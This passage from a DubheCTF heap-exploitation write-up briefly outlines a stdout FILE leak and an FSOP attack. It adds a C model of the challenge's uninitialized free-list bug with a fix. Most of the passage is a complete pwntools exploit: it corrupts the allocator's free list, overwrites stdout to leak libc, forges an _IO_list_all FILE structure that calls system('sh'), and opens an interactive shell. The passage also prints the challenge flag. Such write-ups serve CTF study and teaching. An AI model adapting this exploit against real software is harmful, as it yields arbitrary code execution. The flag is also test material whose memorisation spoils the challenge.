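Next, attack the stdout IO structure to leak a libc address. Getting a suitable address can be more troublesome on the remote and may take several attempts.

Then request one large chunk so that it lands near libc, which saves the trouble of finding the heap address, and finish with FSOP.

(On the remote the request cannot be too large because memory is limited; locally and in Docker it does not matter.)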
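The uninitialized-node problem described above, as an added model that is not the challenge binary's code: it assumes the refill routine (not shown in the decompilation) links the 20 carved chunks but never writes the last node's next pointer, and the hardened branch shows the fix. `arena`, `refill`, `alloc_chunk` and `last_alloc` are hypothetical names, and offsets into a constructed arena stand in for addresses.

```c
#include <stdint.h>
#include <string.h>

#define CHUNK  0x68u                 /* size class used by the page's exploit */
#define NCHUNK 20u                   /* chunks carved per refill */
#define ARENA  (CHUNK * NCHUNK * 2u) /* room for two refills */
#define NIL    UINT64_MAX            /* model's stand-in for a NULL next pointer */

static unsigned char arena[ARENA];   /* constructed pool; offsets act as addresses */
static uint64_t free_head, pool_cur; /* roles of qword_404420[n] and qword_404408 */

static uint64_t load(uint64_t off) { uint64_t v; memcpy(&v, arena + off, 8); return v; }
static void store(uint64_t off, uint64_t v) { memcpy(arena + off, &v, 8); }

/* Carve NCHUNK chunks, hand out the first, link the rest into the free list. */
static uint64_t refill(int hardened) {
    uint64_t first = pool_cur;
    pool_cur += CHUNK * NCHUNK;
    free_head = first + CHUNK;
    for (uint64_t i = 1; i + 1 < NCHUNK; i++)
        store(first + i * CHUNK, first + (i + 1) * CHUNK);
    if (hardened)                    /* the fix: terminate the list explicitly */
        store(first + (NCHUNK - 1) * CHUNK, NIL);
    return first;                    /* buggy form leaves the last node as found */
}

static uint64_t alloc_chunk(int hardened) {
    if (free_head == NIL) return refill(hardened);
    uint64_t off = free_head;
    if (off > ARENA - CHUNK) {       /* head points outside the pool */
        free_head = NIL;             /* the model stops instead of dereferencing */
        return hardened ? NIL : off; /* a buggy allocator would hand this out */
    }
    free_head = load(off);
    return off;
}

/* Fill pool with stale bytes, allocate NCHUNK + 1 chunks, return the last result. */
static uint64_t last_alloc(int hardened, uint64_t stale) {
    for (uint64_t off = 0; off + 8 <= ARENA; off += 8) store(off, stale);
    free_head = NIL; pool_cur = 0;
    uint64_t got = NIL;
    for (unsigned i = 0; i <= NCHUNK; i++) got = alloc_chunk(hardened);
    return got;
}

int main(void) {  /* exit status 0 when the hardened allocator stays in the pool */
    return last_alloc(1, 0x404440) == CHUNK * NCHUNK ? 0 : 1;
}
```

With the stale value 0x404440 taken from the page's exploit, the buggy path returns 0x404440 as the 21st chunk, while the hardened path returns 0x820, the first chunk of a fresh refill.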

exp:

from pwn import*
from pwncli import*
#p=remote('1.95.11.97', 9999)
p=process('./pwn')
elf=ELF("./pwn")
libc=elf.libc
def debug():
    gdb.attach(p)
    pause()

context.log_level='debug'

def cmd(idx):
    p.sendlineafter(b' 2. Dealloc',str(idx))

def alloc(idx,size,cnt):
    cmd(1)
    p.sendlineafter(b'idx: ',str(idx))
    p.sendlineafter(b'size:',str(size))
    p.sendafter(b'Content: ',cnt)

def deallocc(idx):
    cmd(2)
    p.sendlineafter(b'idx:',str(idx))

alloc(33,0x1040,b'a'*0x700+30*p64(0x404440))
deallocc(33)
for i in range(20):
    alloc(i,0x68,b'a')
alloc(20,0x68,p64(0x404040)+p64(0x404440))
debug()
alloc(21,0x28,b'\x80')

alloc(22,0x28, p64(0xfbad3887)+p64(0)*3+p16(0xb000))


libc_base=u64(p.recv(6).ljust(8,b'\x00'))-(0x7b4baee1aff0-0x7b4baec00000)

print(hex(libc_base))
heapaddr=libc_base-0x100001000+0x10
io_all = libc_base + libc.sym['_IO_list_all']
wfile=libc_base+ libc.sym['_IO_wfile_jumps']
lock=libc_base+(0x74caa9a1ca60-0x74caa9800000)

pl=p32(u32(b'  sh'))+p32(0)+p64(0x431)+p64(0)*3+p64(io_all-0x20)
pl+=p64(0)*3
pl+=p64(0)
pl+=p64(0)*7
pl+=p64(lock)
pl+=p64(0)*2
pl+=p64(heapaddr + 0xe0) 
pl+=p64(0)*6
pl+=p64(wfile)
pl+=p64(0)*0x1c
pl+=p64(heapaddr + 0xe0 + 0xe8) 
pl+=p64(0)*0xd
pl+=p64(libc_base+libc.symbols['system']) 

alloc(23,0xffffffff,pl)
alloc(24,0x30,p64(libc_base + libc.sym['_IO_list_all']))
alloc(25,0x28,p64(heapaddr))


cmd(3)

p.interactive()
DubheCTF{Uninitialized_linked_list_nodes_are_dangerous}
Licensed under CC BY-NC-SA 4.0